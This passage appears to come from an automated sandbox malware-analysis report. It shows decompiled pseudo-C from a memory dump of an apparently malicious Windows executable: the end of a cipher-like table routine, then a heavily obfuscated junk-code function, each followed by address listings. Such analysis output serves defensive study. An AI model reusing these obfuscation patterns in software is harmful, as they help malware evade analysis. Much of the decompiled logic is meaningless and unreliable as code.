                                                                                                                                                    				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
                                                                                                                                                    				return _t274;
                                                                                                                                                    			}



















                                                                                                                                                    0x004033de
                                                                                                                                                    0x004033e4
                                                                                                                                                    0x004033e4
                                                                                                                                                    0x004033e7
                                                                                                                                                    0x004033e7
                                                                                                                                                    0x00403180
                                                                                                                                                    0x0040344b
                                                                                                                                                    0x00403454
                                                                                                                                                    0x00403462
                                                                                                                                                    0x004034c0
                                                                                                                                                    0x004034c9
                                                                                                                                                    0x004034d7
                                                                                                                                                    0x00403539
                                                                                                                                                    0x00403542
                                                                                                                                                    0x0040354f
                                                                                                                                                    0x00403552
                                                                                                                                                    0x0040359e
                                                                                                                                                    0x004035aa
                                                                                                                                                    0x004035b3
                                                                                                                                                    0x004035c0
                                                                                                                                                    0x004035c7

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    C-Code - Quality: 43%
                                                                                                                                                    			E0041BC66(signed int __eax, void* __ecx, signed int __edi, signed int __esi) {
                                                                                                                                                    				signed char _t65;
                                                                                                                                                    				signed char _t66;
                                                                                                                                                    				signed char _t67;
                                                                                                                                                    				void* _t70;
                                                                                                                                                    				signed char _t72;
                                                                                                                                                    				signed int _t76;
                                                                                                                                                    				signed int _t78;
                                                                                                                                                    				signed int _t80;
                                                                                                                                                    				signed int _t81;
                                                                                                                                                    				void* _t82;
                                                                                                                                                    				signed int _t87;
                                                                                                                                                    				signed int _t89;
                                                                                                                                                    				void* _t98;
                                                                                                                                                    				void* _t101;
                                                                                                                                                    
                                                                                                                                                    				_t81 = __edi;
                                                                                                                                                    				asm("sbb edx, 0x72cf58e9");
                                                                                                                                                    				_t101 = 0x9a2c6ddc;
                                                                                                                                                    				 *0x7d2f62bd =  *0x7d2f62bd >> 0x86;
                                                                                                                                                    				asm("adc esi, 0x9cc1d683");
                                                                                                                                                    				asm("adc [0xb4e1bbb7], al");
                                                                                                                                                    				asm("adc eax, [0xddb83826]");
                                                                                                                                                    				 *0xe6ca288 = 0xc3d86af7;
                                                                                                                                                    				_t65 = __eax |  *0x31d7232e;
                                                                                                                                                    				asm("ror byte [0x77953802], 0x11");
                                                                                                                                                    				asm("rcl dword [0xd126ddef], 1");
                                                                                                                                                    				 *0x8911611e =  *0x8911611e ^ 0x9a2c6ddc;
                                                                                                                                                    				_t76 = 0x68f73df3;
                                                                                                                                                    				asm("adc edx, [0x2dce8619]");
                                                                                                                                                    				_t80 =  *0x2f29316b * 0x840f;
                                                                                                                                                    				_push(_t80);
                                                                                                                                                    				 *0xb7d8836e = _t89 &  *0x8068242e;
                                                                                                                                                    				asm("stosb");
                                                                                                                                                    				_t72 =  *0x885fcd0b;
                                                                                                                                                    				 *0xcfc014e3 =  *0xcfc014e3 << 0xfe;
                                                                                                                                                    				_t87 = __esi & 0xf7f82029;
                                                                                                                                                    				 *0xd93bc3f5 =  *0xd93bc3f5 >> 0x82;
                                                                                                                                                    				asm("rcl dword [0x6ccdfe31], 0x1f");
                                                                                                                                                    				if(_t87 >= 0) {
                                                                                                                                                    					L1:
                                                                                                                                                    					asm("ror dword [0x57b1f009], 0x69");
                                                                                                                                                    					_t101 = _t101 + 1;
                                                                                                                                                    					asm("rol dword [0x3935b90d], 0xf3");
                                                                                                                                                    				} else {
                                                                                                                                                    					__ebx =  *0x99e3097d * 0x55c;
                                                                                                                                                    					__cl = __cl &  *0x49c6d2b5;
                                                                                                                                                    					_push( *0xcdd93ba1);
                                                                                                                                                    					asm("cmpsb");
                                                                                                                                                    					 *0xdaf91313 =  *0xdaf91313 | 0x9a2c6ddc;
                                                                                                                                                    					asm("rcl dword [0xf422f0bc], 0x1b");
                                                                                                                                                    					asm("sbb edi, [0x617dac1f]");
                                                                                                                                                    					 *0xc88fdd89 =  *0xc88fdd89 & 0x9a2c6ddc;
                                                                                                                                                    					_push( *0x75d3250f);
                                                                                                                                                    					 *0x5e9f25e6 =  *0x5e9f25e6 << 0xa7;
                                                                                                                                                    					__cl = 0xe7;
                                                                                                                                                    					_pop(__ebx);
                                                                                                                                                    					asm("rcl byte [0x7f199230], 0x41");
                                                                                                                                                    					_t35 = __esp;
                                                                                                                                                    					__esp =  *0xd8a5dbc;
                                                                                                                                                    					 *0xd8a5dbc = _t35;
                                                                                                                                                    					asm("sbb eax, [0x8768fe6f]");
                                                                                                                                                    					__edx = 0x72edcc05;
                                                                                                                                                    					__ecx = __ecx &  *0xc917d01e;
                                                                                                                                                    					if(0x68f73df3 >= 0) {
                                                                                                                                                    						goto L1;
                                                                                                                                                    					} else {
                                                                                                                                                    						__ebx =  *0x3b81977d * 0x56d1;
                                                                                                                                                    						__ebx =  *0x3b81977d * 0x000056d1 ^  *0xde0dcfba;
                                                                                                                                                    						asm("stosd");
                                                                                                                                                    						if(__ebx < 0) {
                                                                                                                                                    							goto L1;
                                                                                                                                                    						} else {
                                                                                                                                                    							_pop( *0x2752d970);
                                                                                                                                                    							asm("lodsb");
                                                                                                                                                    							asm("adc bl, 0x24");
                                                                                                                                                    							 *0xc7d1d3e5 =  *0xc7d1d3e5 ^ __bl;
                                                                                                                                                    							__esp = __esp + 0x1e771f16;
                                                                                                                                                    							__ah = __ah + 0x80;
                                                                                                                                                    							asm("cmpsw");
                                                                                                                                                    							__eax = 0x86f3a2df;
                                                                                                                                                    							__edx = __esi;
                                                                                                                                                    							__esi = __esi ^  *0xd55a4601;
                                                                                                                                                    							 *0xe06ef2c9 =  *0xe06ef2c9 - __dl;
                                                                                                                                                    							__ebp = __ebp &  *0xc302c513;
                                                                                                                                                    							__ch = __ch & 0x0000001c;
                                                                                                                                                    							asm("sbb ebx, [0xf490f493]");
                                                                                                                                                    							asm("movsb");
                                                                                                                                                    							__edi = __edi &  *0xac8f46ee;
                                                                                                                                                    							__ah = __ah ^  *0xe91d6e0a;
                                                                                                                                                    							_t38 = __edi;
                                                                                                                                                    							__edi =  *0x140a1afe;
                                                                                                                                                    							 *0x140a1afe = _t38;
                                                                                                                                                    							asm("rcr byte [0xbf968a0a], 0x27");
                                                                                                                                                    							__edi =  *0x140a1afe;
                                                                                                                                                    							__esi = __esi + 0x16084cc7;
                                                                                                                                                    							_push(__ebx);
                                                                                                                                                    							__ch = __ch &  *0x33b352a2;
                                                                                                                                                    							asm("adc edi, 0xa073696d");
                                                                                                                                                    							asm("adc esi, [0x379ded01]");
                                                                                                                                                    							__edi =  *0x140a1afe +  *0x6ef2c9d5;
                                                                                                                                                    							__ecx = __ecx ^  *0xbbd603cc;
                                                                                                                                                    							__esi = __esi &  *0xb130aaf7;
                                                                                                                                                    							asm("cmpsb");
                                                                                                                                                    							 *0x58ab6019 =  *0x58ab6019 << 0x43;
                                                                                                                                                    							asm("lodsd");
                                                                                                                                                    							__cl = 0xff;
                                                                                                                                                    							__esp = __esp +  *0x90841f9b;
                                                                                                                                                    							__ebp = __ebp |  *0x59410207;
                                                                                                                                                    							 *0x9c0398b0 =  *0x9c0398b0 >> 0x17;
                                                                                                                                                    							__eax = 0xffffffff86f3a2e0;
                                                                                                                                                    							if(0x86f3a2df > 0) {
                                                                                                                                                    								goto L1;
                                                                                                                                                    							} else {
                                                                                                                                                    								asm("adc ecx, [0xd13b7c77]");
                                                                                                                                                    								_push(__esi);
                                                                                                                                                    								 *0x2108cfba =  *0x2108cfba >> 0x5b;
                                                                                                                                                    								__ebp = __ebp | 0x7e8e8913;
                                                                                                                                                    								 *0x1a7b31f1 =  *0x1a7b31f1 ^ __ebp;
                                                                                                                                                    								__eax = 0xffffffff86f3a2df;
                                                                                                                                                    								__edx = 0x72edcc05 +  *0x29724189;
                                                                                                                                                    								__dl = 0x24;
                                                                                                                                                    								__edi = __edi - 1;
                                                                                                                                                    								__edi = __edi ^ 0xa74fda3e;
                                                                                                                                                    								__esi = __esi -  *0x254bf2eb;
                                                                                                                                                    								__esi = __esi - 1;
                                                                                                                                                    								__esp = __esp |  *0x40e2c06;
                                                                                                                                                    								__bl = __bl | 0x0000002a;
                                                                                                                                                    								 *0x28a30dc4 =  *0x28a30dc4 << 0xdc;
                                                                                                                                                    								 *0x33c4ebb7 =  *0x33c4ebb7 - 0xe7;
                                                                                                                                                    								asm("sbb edx, [0xd3e528c7]");
                                                                                                                                                    								 *0xe56c7d1 =  *0xe56c7d1 ^ __esi;
                                                                                                                                                    								__ecx = __ecx + 1;
                                                                                                                                                    								__edx = 0x72edcc05 +  *0x29724189 + 1;
                                                                                                                                                    								 *0x110b39d4 =  *0x110b39d4 << 0x8d;
                                                                                                                                                    								 *0xde2f1d82 =  *0xde2f1d82 | __bh;
                                                                                                                                                    								__edi = __edi - 1;
                                                                                                                                                    								__edi = __edi |  *0x161fa306;
                                                                                                                                                    								_push( *0x9963b99a);
                                                                                                                                                    								_push(__ebx);
                                                                                                                                                    								asm("cmpsw");
                                                                                                                                                    								__dh = __dh +  *0xa40075b1;
                                                                                                                                                    								asm("adc al, 0xc");
                                                                                                                                                    								__dl =  *0xc7d1d3e5;
                                                                                                                                                    								 *0xc7d1d3e5 = 0x24;
                                                                                                                                                    								asm("adc [0x7f6cc113], eax");
                                                                                                                                                    								asm("ror dword [0xa0244dbd], 0x5c");
                                                                                                                                                    								__esi = __esi -  *0xbe51c90d;
                                                                                                                                                    								_push( *0x6ecc2c07);
                                                                                                                                                    								_pop( *0x1afee91d);
                                                                                                                                                    								asm("adc dh, 0x10");
                                                                                                                                                    								__ebx = __ebx - 0x6f29883b;
                                                                                                                                                    								asm("adc esi, [0x53e64df1]");
                                                                                                                                                    								__ebx = __esi;
                                                                                                                                                    								asm("adc ch, 0xc9");
                                                                                                                                                    								asm("sbb [0x40f080f], edi");
                                                                                                                                                    								_push( *0x5941583d);
                                                                                                                                                    								asm("scasd");
                                                                                                                                                    								_pop(__esi);
                                                                                                                                                    								 *0x92305be7 =  *0x92305be7 >> 0x32;
                                                                                                                                                    								 *0x8bc1e720 =  *0x8bc1e720 << 0x9a;
                                                                                                                                                    								__esp = __esp &  *0xfad4e61f;
                                                                                                                                                    								__ecx = __ecx -  *0xf527feee;
                                                                                                                                                    								__edx = 0x72edcc05 +  *0x29724189 + 2;
                                                                                                                                                    								__esi = 0xec9fa9cc;
                                                                                                                                                    								_t48 = __dh;
                                                                                                                                                    								__dh =  *0xb3cf6980;
                                                                                                                                                    								 *0xb3cf6980 = _t48;
                                                                                                                                                    								__ah = __ah & 0x0000003a;
                                                                                                                                                    								asm("sbb [0xbf2e5335], eax");
                                                                                                                                                    								asm("sbb al, [0x4c7d3d0c]");
                                                                                                                                                    								__esi = 0xffffffffec9fa9cb;
                                                                                                                                                    								 *0x4115c717 =  *0x4115c717 >> 0xf0;
                                                                                                                                                    								 *0x39801330 =  *0x39801330 + __al;
                                                                                                                                                    								__edx = 0x72edcc05 +  *0x29724189 + 2 - 1;
                                                                                                                                                    								asm("movsw");
                                                                                                                                                    								__edx = 0x72edcc05 +  *0x29724189 + 2 - 1 -  *0x1866ffdd;
                                                                                                                                                    								__edi = __edi + 1;
                                                                                                                                                    								__esp = __esp - 1;
                                                                                                                                                    								asm("adc [0x245b1f16], edi");
                                                                                                                                                    								__edx = 0x72edcc05 +  *0x29724189 + 2 - 0x00000001 -  *0x1866ffdd &  *0xd771687;
                                                                                                                                                    								 *0x563ff564 =  *0x563ff564 >> 0x49;
                                                                                                                                                    								_push(0x86da796f);
                                                                                                                                                    								__ecx = __ecx - 1;
                                                                                                                                                    								__ch = __ch ^  *0xb36fc7e0;
                                                                                                                                                    								asm("adc [0x60ce066], ecx");
                                                                                                                                                    								__ebp = __ebp &  *0x61b1753d;
                                                                                                                                                    								_push(__ebx);
                                                                                                                                                    								asm("adc ch, 0xb7");
                                                                                                                                                    								if((__ebx & 0xc34c6b95) <= 0) {
                                                                                                                                                    									goto L1;
                                                                                                                                                    								} else {
                                                                                                                                                    									asm("ror dword [0x6d560e76], 0xb5");
                                                                                                                                                    									__esi = 0xffffffffc4a6e3c6;
                                                                                                                                                    									 *0xd4e5cee7 =  *0xd4e5cee7 << 0x2f;
                                                                                                                                                    									if( *0xd4e5cee7 >= 0) {
                                                                                                                                                    										goto L1;
                                                                                                                                                    									} else {
                                                                                                                                                    										__edx = __edx &  *0x61fd7773;
                                                                                                                                                    										_pop( *0x77939415);
                                                                                                                                                    										__eax = 0xffffffff86f3a2df |  *0xc29ac2fd;
                                                                                                                                                    										 *0xa711e0c0 =  *0xa711e0c0 + __esp;
                                                                                                                                                    										__bh = __bh + 0xe6;
                                                                                                                                                    										if(__bh < 0) {
                                                                                                                                                    											goto L1;
                                                                                                                                                    										} else {
                                                                                                                                                    											__esp = __esp - 1;
                                                                                                                                                    											__edx = __edx &  *0xc378bdcc;
                                                                                                                                                    											__eax = __eax - 1;
                                                                                                                                                    											__ecx = 0xadcfcd07;
                                                                                                                                                    											asm("adc eax, [0x8586fbbc]");
                                                                                                                                                    											 *0xb2c30423 =  *0xb2c30423 - __ebx;
                                                                                                                                                    											asm("sbb [0x6bfd1691], ecx");
                                                                                                                                                    											__edx = __edx ^  *0xb35aa823;
                                                                                                                                                    											 *0x743fd666 = 0x3575ca3e;
                                                                                                                                                    											__ebx = __ebx ^ 0xa9281068;
                                                                                                                                                    											__eax = __eax + 1;
                                                                                                                                                    											__ebp = 0x9e7b10a1;
                                                                                                                                                    											 *0x75d09d7 =  *0x75d09d7 << 0xd1;
                                                                                                                                                    											asm("ror byte [0xdbdb1508], 0xe");
                                                                                                                                                    											asm("sbb [0xa7c02bb5], ah");
                                                                                                                                                    											__cl = 0x1d1;
                                                                                                                                                    											__ebx = __ebx |  *0x40ca42b9;
                                                                                                                                                    											__esp = __esp - 1;
                                                                                                                                                    											 *0x5654a4db =  *0x5654a4db & 0xadcfcd07;
                                                                                                                                                    											__esp = __esp - 1;
                                                                                                                                                    											 *0xc378bdcc =  *0xc378bdcc >> 0xed;
                                                                                                                                                    											__esp = __esp | 0x959d9111;
                                                                                                                                                    											asm("sbb [0x8d89ba20], dl");
                                                                                                                                                    											__esi =  *0xebfa06b * 0xf219;
                                                                                                                                                    											_push( *0x684ca7c7);
                                                                                                                                                    											__ebx = __ebx + 1;
                                                                                                                                                    											 *0x48d055f2 =  *0x48d055f2 | __dh;
                                                                                                                                                    											__esp = __esp + 0xabd297bd;
                                                                                                                                                    											__ebx = 0x13080f36;
                                                                                                                                                    											asm("ror byte [0xb79f1886], 0x6c");
                                                                                                                                                    											__edx = __edx - 1;
                                                                                                                                                    											asm("cmpsw");
                                                                                                                                                    											__esi =  *0xebfa06b * 0xf219 - 1;
                                                                                                                                                    											 *0x608156b0 =  *0x608156b0 - __dl;
                                                                                                                                                    											__ebx = 0xffffffffa42c93c9;
                                                                                                                                                    											__esp =  *0x1afee91d;
                                                                                                                                                    											__edi = __edi &  *0x8dbe7311;
                                                                                                                                                    											 *0x67c06df6 =  *0x67c06df6 & __bl;
                                                                                                                                                    											 *0x13c18cdb = __edi;
                                                                                                                                                    											__ebp = __esp;
                                                                                                                                                    											asm("sbb eax, 0x3575ca3e");
                                                                                                                                                    											__esp =  *0x1afee91d &  *0x1e5d0c68;
                                                                                                                                                    											__esi =  *0xebfa06b * 0xf219;
                                                                                                                                                    											 *0x9b31508e =  *0x9b31508e ^ __esi;
                                                                                                                                                    											__eax = __eax + 1;
                                                                                                                                                    											__eax = __eax |  *0x76b5ca61;
                                                                                                                                                    											 *0x66c56e14 =  *0x66c56e14 + __bl;
                                                                                                                                                    											__ch = __ch |  *0xd2c22fa0;
                                                                                                                                                    											asm("movsw");
                                                                                                                                                    											asm("stosb");
                                                                                                                                                    											 *0xe9fb51a =  *0xe9fb51a << 0x22;
                                                                                                                                                    											_pop(__ecx);
                                                                                                                                                    											__ebp = 0xe6b0021;
                                                                                                                                                    											__eax = __eax - 0x970e1316;
                                                                                                                                                    											__edx = __edx +  *0xfd7773d4;
                                                                                                                                                    											__ebx = 0x5a7a52a;
                                                                                                                                                    											__ch = __ch +  *0x2f52a92a;
                                                                                                                                                    											__dh = __dh -  *0x27bb1d32;
                                                                                                                                                    											if(0x72edcc05 !=  *0xca3e6f62) {
                                                                                                                                                    												goto L1;
                                                                                                                                                    											} else {
                                                                                                                                                    												asm("ror dword [0xf683575], 0x37");
                                                                                                                                                    												asm("adc [0x56c90420], bh");
                                                                                                                                                    												__ecx = 0xadcfcd07 -  *0xde3fbaeb;
                                                                                                                                                    												_t61 = __esi;
                                                                                                                                                    												__esi =  *0xe75e826f;
                                                                                                                                                    												 *0xe75e826f = _t61;
                                                                                                                                                    												_pop(__ebx);
                                                                                                                                                    												asm("rol dword [0x22181492], 0x46");
                                                                                                                                                    												asm("stosd");
                                                                                                                                                    												asm("ror byte [0xdcc5bce5], 0x40");
                                                                                                                                                    												 *0x39950d3 =  *0x39950d3 + __esp;
                                                                                                                                                    												_pop(__ebx);
                                                                                                                                                    												_push(0x9214341e);
                                                                                                                                                    												if( *0x39950d3 != 0) {
                                                                                                                                                    													goto L1;
                                                                                                                                                    												} else {
                                                                                                                                                    													asm("adc [0x9fb51a7b], eax");
                                                                                                                                                    													 *0xc2f9b410 =  *0xc2f9b410 ^ __dh;
                                                                                                                                                    													_t62 = __esi;
                                                                                                                                                    													__esi =  *0x663fba2f;
                                                                                                                                                    													 *0x663fba2f = _t62;
                                                                                                                                                    													__ecx = __ecx - 1;
                                                                                                                                                    													_pop(__eax);
                                                                                                                                                    													__edi = __edi &  *0x17080f36;
                                                                                                                                                    													 *0x380d70b3 =  *0x380d70b3 | __bh;
                                                                                                                                                    													 *0x6e057da8 =  *0x6e057da8 << 0x3d;
                                                                                                                                                    													__ebx =  *0xb4f306ef;
                                                                                                                                                    													 *0xb4f306ef = 0x5a7a52a;
                                                                                                                                                    													__dl = __dl | 0x00000063;
                                                                                                                                                    													 *0x36447e19 =  *0x36447e19 << 0x1d;
                                                                                                                                                    													asm("adc ebp, [0x460cc91f]");
                                                                                                                                                    													if( *0x36447e19 != 0) {
                                                                                                                                                    														goto L1;
                                                                                                                                                    														do {
                                                                                                                                                    															do {
                                                                                                                                                    																do {
                                                                                                                                                    																	do {
                                                                                                                                                    																		do {
                                                                                                                                                    																			goto L1;
                                                                                                                                                    																		} while ((_t65 & 0x0000000a) >= 0);
                                                                                                                                                    																		asm("scasb");
                                                                                                                                                    																		_t82 =  *0x8a5d6305;
                                                                                                                                                    																		asm("cmpsb");
                                                                                                                                                    																		_push( *0xafe8b8c4);
                                                                                                                                                    																		_t66 = _t65 |  *0x57bf634;
                                                                                                                                                    																		asm("rcr byte [0x82141b7], 0x16");
                                                                                                                                                    																		_push(_t87);
                                                                                                                                                    																		asm("rcl dword [0x21ac910d], 0xe5");
                                                                                                                                                    																		asm("sbb ch, [0xa3a45ad7]");
                                                                                                                                                    																		asm("sbb [0xa61356b1], bh");
                                                                                                                                                    																		_push(_t66);
                                                                                                                                                    																		_push(_t82 + 0xba0876cf);
                                                                                                                                                    																		_push( *0x32e74801);
                                                                                                                                                    																		_t9 = _t87;
                                                                                                                                                    																		_t87 =  *0x57856a35;
                                                                                                                                                    																		 *0x57856a35 = _t9;
                                                                                                                                                    																		asm("rol byte [0x8111ecb6], 0x92");
                                                                                                                                                    																		 *0x550a0908 =  *0x550a0908 ^ _t66;
                                                                                                                                                    																		_t81 =  *0xba69866a * 0xff7d;
                                                                                                                                                    																		_push(_t72);
                                                                                                                                                    																		_t67 = _t66 & 0x00000008;
                                                                                                                                                    																		 *0xb6e71d0a = _t72;
                                                                                                                                                    																		asm("rol byte [0x1761d412], 0x56");
                                                                                                                                                    																		 *0xf083184 = _t67;
                                                                                                                                                    																		asm("sbb esp, [0xdb89a2fb]");
                                                                                                                                                    																		asm("cmpsw");
                                                                                                                                                    																		asm("ror dword [0xe115810f], 0x13");
                                                                                                                                                    																		 *0x740acff9 =  *0x740acff9 >> 0xe7;
                                                                                                                                                    																		_t98 = ( *0x8e77569 * 0x0000da0a |  *0x3491b383) -  *0x830117eb;
                                                                                                                                                    																		 *0x3b2bb32b =  *0x3b2bb32b - _t87;
                                                                                                                                                    																		_t72 =  *0x364b2e6a * 0xb469;
                                                                                                                                                    																		_t65 =  *0x1f7901fa;
                                                                                                                                                    																		 *0x1f7901fa = _t67 - 1;
                                                                                                                                                    																		 *0xd2bff8cf =  *0xd2bff8cf << 0;
                                                                                                                                                    																		_t101 = (0xffffffff93ef5717 +  *0x3080086d |  *0xe34b4d3b) - 0x9ceffbdf;
                                                                                                                                                    																		 *0xe88f63f7 =  *0xe88f63f7 ^ 0x90f9ad25;
                                                                                                                                                    																	} while ( *0xe88f63f7 == 0);
                                                                                                                                                    																	asm("adc [0x9c51b074], ecx");
                                                                                                                                                    																	 *0xae61426 = _t81;
                                                                                                                                                    																	asm("movsb");
                                                                                                                                                    																	 *0xdd145d4 =  *0xdd145d4 - _t87;
                                                                                                                                                    																	asm("adc esi, [0x8ff90139]");
                                                                                                                                                    																	_t87 = _t87 + 2;
                                                                                                                                                    																	 *0xb454e0e0 =  *0xb454e0e0 - _t80;
                                                                                                                                                    																	asm("adc [0xa41e48bb], esi");
                                                                                                                                                    																	_pop(_t81);
                                                                                                                                                    																	 *0x493bdb32 =  *0x493bdb32 >> 0x39;
                                                                                                                                                    																	L1();
                                                                                                                                                    																	asm("ror dword [0xb221b2e8], 0xc5");
                                                                                                                                                    																	_t65 = _t65 & 0x0000001c;
                                                                                                                                                    																	asm("adc ebp, [0x7ac35861]");
                                                                                                                                                    																	 *0xf7154f3b =  *0xf7154f3b - 0x90f9ad25;
                                                                                                                                                    																	_t76 = _t76 + 1;
                                                                                                                                                    																	 *0xa24e3c15 =  *0xa24e3c15 - _t80;
                                                                                                                                                    																	 *0x3be3279f =  *0x3be3279f & _t72;
                                                                                                                                                    																	asm("sbb [0x9042f2c2], ebx");
                                                                                                                                                    																} while ( *0x3be3279f > 0);
                                                                                                                                                    																 *0x2babc577 =  *0x2babc577 - _t98;
                                                                                                                                                    																_t80 = _t80 +  *0x424a9db9;
                                                                                                                                                    																_t81 = _t81 + 0x30926d8e;
                                                                                                                                                    																 *0xce31028 =  *0xce31028 >> 0xf3;
                                                                                                                                                    																 *0xf0c0aff9 =  *0xf0c0aff9 - _t65;
                                                                                                                                                    																_t76 =  *0x7c91f760 * 0xaee;
                                                                                                                                                    																_push( *0xdc88d5bb);
                                                                                                                                                    																_t72 = _t72 & 0x00000063 ^  *0x9808efbb;
                                                                                                                                                    																_t87 = _t87 - 1;
                                                                                                                                                    																 *0xef44fb8f =  *0xef44fb8f + _t76;
                                                                                                                                                    																_pop( *0x6b431bd4);
                                                                                                                                                    																 *0xd3664a3b =  *0xd3664a3b + _t72;
                                                                                                                                                    																_t65 = _t65 ^  *0x98aa13f9;
                                                                                                                                                    															} while (_t65 != 0);
                                                                                                                                                    															asm("sbb ebx, [0xd521607a]");
                                                                                                                                                    															 *0xfc4edb89 =  *0xfc4edb89 >> 0xfa;
                                                                                                                                                    															asm("rcr dword [0xa6216009], 0x1c");
                                                                                                                                                    															_t78 = _t76 - 1;
                                                                                                                                                    															 *0xf40b53c0 = _t78;
                                                                                                                                                    															_t76 = _t78 ^  *0x86c89b15;
                                                                                                                                                    															_t101 = _t81;
                                                                                                                                                    															_push(_t65);
                                                                                                                                                    															asm("adc ebx, 0xb9213b81");
                                                                                                                                                    															_t72 = _t72 + 1;
                                                                                                                                                    															 *0xc5516339 =  *0xc5516339 - _t65;
                                                                                                                                                    														} while ( *0xc5516339 == 0);
                                                                                                                                                    														asm("adc esp, 0xe90ea674");
                                                                                                                                                    														 *0xdc9265ee =  *0x1175f627;
                                                                                                                                                    														 *0x6bba0e61 = _t65;
                                                                                                                                                    														asm("adc edi, [0x9584be31]");
                                                                                                                                                    														_pop(_t70);
                                                                                                                                                    														asm("movsb");
                                                                                                                                                    														return _t70;
                                                                                                                                                    													} else {
                                                                                                                                                    														__esi = __esi | 0x8773297b;
                                                                                                                                                    														 *0x4c6bbc1a =  *0x4c6bbc1a & __dl;
                                                                                                                                                    														return __eax;
                                                                                                                                                    													}
                                                                                                                                                    												}
                                                                                                                                                    											}
                                                                                                                                                    										}
                                                                                                                                                    									}
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    			}

















                                                                                                                                                    0x0041be41
                                                                                                                                                    0x0041be48
                                                                                                                                                    0x0041be49
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041be4f
                                                                                                                                                    0x0041be4f
                                                                                                                                                    0x0041be55
                                                                                                                                                    0x0041be56
                                                                                                                                                    0x0041be5d
                                                                                                                                                    0x0041be63
                                                                                                                                                    0x0041be69
                                                                                                                                                    0x0041be6a
                                                                                                                                                    0x0041be70
                                                                                                                                                    0x0041be72
                                                                                                                                                    0x0041be73
                                                                                                                                                    0x0041be79
                                                                                                                                                    0x0041be85
                                                                                                                                                    0x0041be86
                                                                                                                                                    0x0041be8c
                                                                                                                                                    0x0041be8f
                                                                                                                                                    0x0041be96
                                                                                                                                                    0x0041be9c
                                                                                                                                                    0x0041bea2
                                                                                                                                                    0x0041bea8
                                                                                                                                                    0x0041bea9
                                                                                                                                                    0x0041beb0
                                                                                                                                                    0x0041bec3
                                                                                                                                                    0x0041bec9
                                                                                                                                                    0x0041beca
                                                                                                                                                    0x0041bed0
                                                                                                                                                    0x0041bed6
                                                                                                                                                    0x0041bed7
                                                                                                                                                    0x0041bedf
                                                                                                                                                    0x0041bee5
                                                                                                                                                    0x0041bee7
                                                                                                                                                    0x0041bee7
                                                                                                                                                    0x0041beee
                                                                                                                                                    0x0041bef4
                                                                                                                                                    0x0041befb
                                                                                                                                                    0x0041bf01
                                                                                                                                                    0x0041bf07
                                                                                                                                                    0x0041bf0d
                                                                                                                                                    0x0041bf10
                                                                                                                                                    0x0041bf16
                                                                                                                                                    0x0041bf1c
                                                                                                                                                    0x0041bf1d
                                                                                                                                                    0x0041bf26
                                                                                                                                                    0x0041bf32
                                                                                                                                                    0x0041bf38
                                                                                                                                                    0x0041bf39
                                                                                                                                                    0x0041bf3a
                                                                                                                                                    0x0041bf41
                                                                                                                                                    0x0041bf48
                                                                                                                                                    0x0041bf4e
                                                                                                                                                    0x0041bf54
                                                                                                                                                    0x0041bf55
                                                                                                                                                    0x0041bf5a
                                                                                                                                                    0x0041bf5a
                                                                                                                                                    0x0041bf5a
                                                                                                                                                    0x0041bf60
                                                                                                                                                    0x0041bf63
                                                                                                                                                    0x0041bf69
                                                                                                                                                    0x0041bf6f
                                                                                                                                                    0x0041bf70
                                                                                                                                                    0x0041bf77
                                                                                                                                                    0x0041bf7d
                                                                                                                                                    0x0041bf84
                                                                                                                                                    0x0041bf86
                                                                                                                                                    0x0041bf8c
                                                                                                                                                    0x0041bf8d
                                                                                                                                                    0x0041bf94
                                                                                                                                                    0x0041bf9a
                                                                                                                                                    0x0041bfa0
                                                                                                                                                    0x0041bfa7
                                                                                                                                                    0x0041bfac
                                                                                                                                                    0x0041bfad
                                                                                                                                                    0x0041bfb3
                                                                                                                                                    0x0041bfb9
                                                                                                                                                    0x0041bfbf
                                                                                                                                                    0x0041bfc6
                                                                                                                                                    0x0041bfc9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041bfcf
                                                                                                                                                    0x0041bfcf
                                                                                                                                                    0x0041bfd6
                                                                                                                                                    0x0041bfdc
                                                                                                                                                    0x0041bfe3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041bfe9
                                                                                                                                                    0x0041bfe9
                                                                                                                                                    0x0041bfef
                                                                                                                                                    0x0041bff5
                                                                                                                                                    0x0041bffb
                                                                                                                                                    0x0041c001
                                                                                                                                                    0x0041c004
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041c00a
                                                                                                                                                    0x0041c00f
                                                                                                                                                    0x0041c010
                                                                                                                                                    0x0041c01c
                                                                                                                                                    0x0041c01d
                                                                                                                                                    0x0041c023
                                                                                                                                                    0x0041c029
                                                                                                                                                    0x0041c03b
                                                                                                                                                    0x0041c041
                                                                                                                                                    0x0041c04d
                                                                                                                                                    0x0041c052
                                                                                                                                                    0x0041c058
                                                                                                                                                    0x0041c05f
                                                                                                                                                    0x0041c065
                                                                                                                                                    0x0041c06c
                                                                                                                                                    0x0041c073
                                                                                                                                                    0x0041c079
                                                                                                                                                    0x0041c07c
                                                                                                                                                    0x0041c082
                                                                                                                                                    0x0041c083
                                                                                                                                                    0x0041c089
                                                                                                                                                    0x0041c08a
                                                                                                                                                    0x0041c091
                                                                                                                                                    0x0041c097
                                                                                                                                                    0x0041c09d
                                                                                                                                                    0x0041c0a7
                                                                                                                                                    0x0041c0b3
                                                                                                                                                    0x0041c0b4
                                                                                                                                                    0x0041c0bb
                                                                                                                                                    0x0041c0c1
                                                                                                                                                    0x0041c0c6
                                                                                                                                                    0x0041c0cd
                                                                                                                                                    0x0041c0ce
                                                                                                                                                    0x0041c0d0
